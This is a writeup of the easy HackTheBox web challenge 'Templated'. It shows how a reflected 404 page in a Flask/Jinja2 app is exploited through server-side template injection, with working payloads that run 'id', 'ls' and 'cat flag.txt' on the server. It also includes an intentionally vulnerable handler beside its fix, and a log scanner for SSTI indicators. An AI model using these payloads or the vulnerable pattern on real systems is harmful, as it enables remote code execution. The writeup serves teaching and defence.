HackTheBox | Templated

Writeup of an easy-rated Web Exploitation challenge from HackTheBox


Templated is a Web Exploitation challenge from HackTheBox that revolves around exploiting a Server-Side Template Injection vulnerability in order to achieve remote code execution on the server and eventually read the flag.

Challenge Name

Templated Challenge


Challenge Description


  • Can you exploit this simple mistake?

Write-Up


Enumeration:

Front page:

Navigating to the provided docker instance (144.126.206.23:32088), you will be presented with the following web page:

Front page
  • The website’s front page is pretty empty: it consists only of text, without any interactive elements such as buttons, logos, or links.
  • However, the front page reveals the framework and templating engine used in the backend of this application, which is Flask/Jinja2.

Source code:

The source code of the page doesn’t contain any hidden secrets, such as developer’s comments or hidden directories.

Source code

Server's response:

Taking a look at the server’s response, the Server HTTP header discloses Werkzeug/1.0.1 and Python/3.9.0, which are used in conjunction with Flask as the backend infrastructure.

Server Header

Werkzeug's console:

Werkzeug is a comprehensive WSGI (Web Server Gateway Interface) utility library for Python. It serves as a foundation for developing web applications and is often used in conjunction with web frameworks such as Flask to handle the low-level aspects of web development.
Werkzeug also provides a development server with a built-in debugger, which includes an interactive console (the Werkzeug debugger console). This console allows developers to execute Python code and inspect variables while debugging.
Long story short, if debug mode is enabled, we can access the /console endpoint and easily gain RCE - Remote Code Execution on the server running the vulnerable web application.

Detecting the vulnerability:

Unfortunately, debug mode is disabled on the server. However, navigating to /console does not return a 404 - NOT FOUND status code; instead it returns 200 OK, which suggests that the 404 page is being rendered through a template.

Templated 404 pages
  • As you can see, the web application reflects the name of the directory or file we tried to access, console in this example.
  • This might lead to an SSTI - Server-Side Template Injection vulnerability if the user input taken from the URL is inserted into the template without proper sanitization.
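To make the "simple mistake" concrete, here is an added example (not the challenge's source, which the writeup does not show) of a Flask-style "page not found" handler written the insecure way, next to the corrected version. It uses the jinja2 package directly, which is what Flask's render_template_string calls under the hood; the template text and the {{7*7}} probe are assumptions for illustration.

```python
# Added example, not the challenge's own code. Requires the jinja2 package.
from jinja2 import Environment

# Autoescaping is on, to show that HTML escaping alone does not stop SSTI:
# the expression is evaluated before any output escaping happens.
env = Environment(autoescape=True)


def render_404_vulnerable(requested_path: str) -> str:
    """The mistake: the user-controlled path is pasted into the template
    SOURCE, so Jinja2 parses and evaluates any {{ ... }} it contains."""
    template_source = (
        f"<h1>Error 404</h1><p>The page '{requested_path}' could not be found</p>"
    )
    return env.from_string(template_source).render()


def render_404_safe(requested_path: str) -> str:
    """The fix: the template is a constant and the path is passed as DATA,
    so it is printed as text (and HTML-escaped) instead of being parsed."""
    template_source = (
        "<h1>Error 404</h1><p>The page '{{ path }}' could not be found</p>"
    )
    return env.from_string(template_source).render(path=requested_path)


def is_template_evaluated(rendered: str, expected: str = "49") -> bool:
    """Harmless self-check used when auditing a handler: a {{7*7}} probe
    turns into 49 only if the input was interpreted as template code."""
    return expected in rendered


if __name__ == "__main__":
    probe = "{{7*7}}"  # constructed probe, evaluates arithmetic only
    print("vulnerable:", render_404_vulnerable(probe))  # ... '49' ...
    print("safe      :", render_404_safe(probe))        # ... '{{7*7}}' ...
```

The defensive takeaway is that the template string must never be built from request data, whether by f-string, concatenation or format(); pass the value through the render context instead. Autoescaping, input filtering and a sandboxed environment are extra layers, not a substitute for that rule.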

Exploitation:

Remote Code Execution:

Since we know that the server is using Flask, a Python framework, we can walk the object graph of objects exposed to the template (such as Flask's request object) through attributes like __globals__ up to Python's builtins, which allows us to import the os module.
Once we have access to the os module, we can execute OS commands on the server hosting the web application.

```
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
```


id command


Since we already know the templating engine in use, which is Jinja2, we can leverage Jinja2-specific expressions like the following:

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
```


id command
  • As you can see, this Jinja2-specific expression uses the os module to execute the id command.

Flag:

Now that we have remote code execution on the server, we can execute the ls command to list the files and directories located in the current directory:

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read()}}
```


ls command
  • As you can see, there is a text file named flag.txt.

Let’s read the content of the flag.txt file by injecting the following payload:

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}
```


Flag
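From the defender's side, the probing shown in this writeup leaves a clear trace: the template delimiters and dunder attribute names travel in the request path and end up in the web server's access log. The following added example (not part of the original post) is a small stdlib-only scanner that parses common-format access log lines and flags such requests; the log lines, IP addresses and timestamps are constructed for the example.

```python
# Added example, not from the original post: flag requests whose URL path
# carries Jinja2 expression syntax or dunder attribute names.
import re
from urllib.parse import unquote

# Constructed sample lines in the common (NCSA) access log format.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2024:10:00:04 +0000] "GET /console HTTP/1.1" 200 231
203.0.113.5 - - [10/Jan/2024:10:00:09 +0000] "GET /%7B%7B7*7%7D%7D HTTP/1.1" 200 229
203.0.113.5 - - [10/Jan/2024:10:00:15 +0000] "GET /%7B%7Bself.__init__.__globals__%7D%7D HTTP/1.1" 200 1990
198.51.100.7 - - [10/Jan/2024:10:01:00 +0000] "GET /about HTTP/1.1" 200 840
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators checked against the URL-decoded path.
TEMPLATE_DELIMITERS = re.compile(r"\{\{|\{%|\}\}|%\}")
DUNDER_ATTRIBUTE = re.compile(r"__[A-Za-z]+__")


def classify_path(raw_path: str) -> list[str]:
    """Return the indicator names matched by a request path (empty if clean)."""
    path = unquote(raw_path)  # probes are usually URL-encoded in transit
    hits = []
    if TEMPLATE_DELIMITERS.search(path):
        hits.append("template-delimiters")
    if DUNDER_ATTRIBUTE.search(path):
        hits.append("dunder-attribute")
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse each log line and return the suspicious requests with their indicators."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line, skip rather than crash the scan
        hits = classify_path(match["path"])
        if hits:
            findings.append({
                "ip": match["ip"],
                "time": match["ts"],
                "path": unquote(match["path"]),
                "status": int(match["status"]),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Both matched lines in the sample were answered with 200, which is exactly the symptom the writeup used to spot the templated 404 page; a rule that pairs these indicators with a success status on a non-existent path is a reasonable alert for a WAF or SIEM, and the same check on the application side can reject such paths before they reach a template.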
This post is licensed under CC BY 4.0 by the author.